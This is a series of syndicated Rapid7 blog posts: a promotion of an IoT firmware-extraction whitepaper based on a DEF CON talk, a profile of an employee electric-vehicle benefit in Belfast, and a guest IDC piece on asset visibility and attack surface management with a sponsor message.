Every year, Rapid7 is a presenter at DEF CON’s IoT Village, sharing in-depth insight and expertise into the hacking of all things Internet of Things. This year, our perennial IoT hacking presenter, Principal Security Researcher, IoT, Deral Heiland, along with Rapid7 pentest team members, showed attendees many methods of extracting firmware from IoT devices and manipulating the systems in the name of control and operations.

Extracting firmware without the use of destructive means can be difficult and in some cases impossible. However, Deral went deep with IoT Village attendees, presenting a live hands-on exercise each attendee in the room could interact with. It was an enlightening and productive presentation. But we are aware not everyone could make it to DEF CON 32 this year.

Which is why we’ve transformed the presentation into a handy whitepaper. Deral has gone step-by-step through the exercise, and even improved upon it in some cases (so even if you were in the room, there’s likely even more for you to get from it). While DEF CON 32 may be firmly in the rear-view mirror, the hacking carries on. And if you missed DEF CON, or Deral’s presentation, you have another chance to learn and take part in the exercise.

To check out the whitepaper, please click here. And if you’d like to learn more about Deral’s previous IoT Village presentations (he’s done a lot of them), many live right here on the blog.

Test Driving a New Benefit Programme in Belfast

Post Syndicated from Rapid7 original https://blog.rapid7.com/2024/10/16/test-driving-a-new-benefit-programme-in-belfast/

Test Driving a New Benefit Programme in Belfast

When most people think about benefits packages at work, what typically comes to mind are things like healthcare programmes, financial stipends, or wellbeing incentives. For Stephen, one benefit he uses on a daily basis comes on four wheels.

Rapid7’s electric vehicle scheme was rolled out in late 2023 for Belfast employees. The programme enables employees to lease an electric car via their employer and pay for it on a salary sacrifice basis, offering substantial tax and national insurance savings.

“I kept reading about the program and thinking – is it really this simple? What’s the catch?” said Stephen Gallagher, a Lead Product Manager who received his new electric BMW this past May. “The more I learned about the process and understood what that pre-tax payment would be vs. paying for a vehicle on my own, it was really a no brainer.”

The unique offering also contributes to the company’s sustainability goals by making electric vehicles more accessible, thanks to the pre-tax salary sacrifice. “I’ve worked for some other big tech companies in Belfast, but I’ve never seen this as a company offering. It definitely gives me a great sense of pride to work for Rapid7, and I feel motivated to do well for a company that takes care of employees in such a unique way.”

Test Driving a New Benefit Programme in Belfast

“The program provides employees with make and model options based on different salary levels to ensure the monthly payment is reasonable. Once an employee enrolls and selects a vehicle, our vendor sources it and coordinates delivery. Employees don’t pay anything until the vehicle is delivered.” Says Karen Hendry, Senior Benefits Manager. “I’ve watched employees go through the process, and I’m excited to have just taken ownership of a car myself through the programme!”

In addition to a competitive monthly payment, the program also eliminates the need for down payments, dealer fees, maintenance, or separate insurance fees as the offering is all inclusive. Stephen shared more on his recent experience by adding “I recently got a scratch on the car, so it’s been in the shop to get repaired. All I had to do was reach out to our vendor, and they got me in touch with a repair shop and coordinated everything for me”.

“As a benefits team, we are always evaluating our offerings and looking for ways to bring value to our employees through unique programmes. It’s exciting to see something new like this take off successfully in Belfast”

Learn more about Rapid7 in Belfast here.

Proactive Visibility Is Foundational to Strong Cybersecurity

Post Syndicated from Rapid7 original https://blog.rapid7.com/2024/09/30/proactive-visibility-is-foundational-to-strong-cybersecurity/

Proactive Visibility Is Foundational to Strong Cybersecurity

Authored by Guest IDC Blogger: Michelle Abraham

Exposures are more than CVEs, so organizations need to move beyond the traditional thinking of vulnerability management to a holistic view. Part of that view must be greater visibility into devices, users, applications, and all the digital infrastructure connected to an organization’s environment. Gaps in that view create risk exposure. Organizations must proactively identify anything that presents a risk to determine whether to act.

Solutions that improve visibility discover assets, aggregate all asset data in one place, and enrich that data to understand the relationships between users, assets, and applications. These cybersecurity asset management systems connect to other security tools in the IT environment to gather their telemetry on what they see and the communications they have. The data from these connections can overlap and be duplicative, so the system needs to deduplicate the data to render it useful for security.

Attack surface management (ASM) adds to the visibility by showing an external view of the digital estate, allowing security teams to see the view attackers have from outside their environment. Attack surfaces have expanded rapidly and often involve a hybrid multicloud environment and SaaS applications, including GenAI. Identifying unknown internet-exposed assets that provide a pathway to critical data is essential to managing risk.

Knowing what constitutes the environment that must be secured should be the foundation upon which the rest is built. Finding part of shadow IT helps with a portion of the problem but does not solve it. Alternatively, investigating assets that are falsely attributed to an organization wastes time. It is common for organizations to find 15%–30% more assets when they adopt security tooling for asset discovery.

Solutions need to bring together many sources of data — both first- and-third-party internal and external views of the environment — for a single source of truth about an organization’s digital estate. The assets must include both cloud and on-premises resources to optimize the organization’s security posture for its risk tolerance level. Solutions should also be capable of discovering unknown users and the unsanctioned use of IT resources and applications, which are additional risk exposures. The addition of threat and vulnerability intelligence helps security team’s understand the exploitability of the exposure so the most critical issues can be prioritized for remediation.

The flow of information from these tools requires continuous updating because threat actors can seize on any gap, whether recent or present from the beginning. The data shown should include asset configuration and asset criticality in the context of the business, such as whether the asset supports key business applications or has access to sensitive datasets. Knowing who owns an asset is also vital information so that security and IT know who is responsible for fixing a problem when it arises, particularly if ownership resides outside these two areas. Asset ownership will drive accountability for remediation programs and campaigns.

With a bi-directional connection to the configuration management database (CMDB), a solution that combines Cyber Asset Attack Surface Management (CAASM) and ASM further aligns the entire organization with the most updated information. It augments the CMDB to help with asset lifecycle management because end-of-life devices that no longer receive updates pose a risk. Systems should also be able to track and report on additional exposures, such as expiring certificates or unknown certificate issuers.

A map of asset and user relationships helps visualize the paths that attackers can take to traverse the network for lateral movement in the environment to get to the organization’s crown jewels. CAASM and ASM output must be more than just a dump of data from various tools; the data must be easy to query, with actionable insights that help the organization reduce risk. Matching the data from assets provides teams reacting to threats with complete context regarding assets to aid their investigation and remediation efforts. The remediation process is easier when there are recommended actions as well as integrations with ticketing systems or automation platforms that inform asset owners of issues as well as track the status of the patch or mitigation.

Consider CAASM and ASM as foundational elements to a strong, mature security program that is aware of its entire digital estate. This visibility eliminates one of the ways attackers take organizations by surprise, thereby reducing overall risk.

Message from the Sponsor

The dynamic nature of modern IT environments demands a proactive and continuous approach to exposure management. Doing so requires real-time visibility into your entire digital estate and the exposures that leave your organization vulnerable to compromise. By enriching unified internal and external views of your attack surface with real-world threat intelligence and context from your entire tooling ecosystem, teams have the situational awareness needed to prioritize response efforts and accelerate mean time to remediation. Watch this on-demand demo to learn how Rapid7 Exposure Command can help transform your security program and allow you to take command of your attack surface.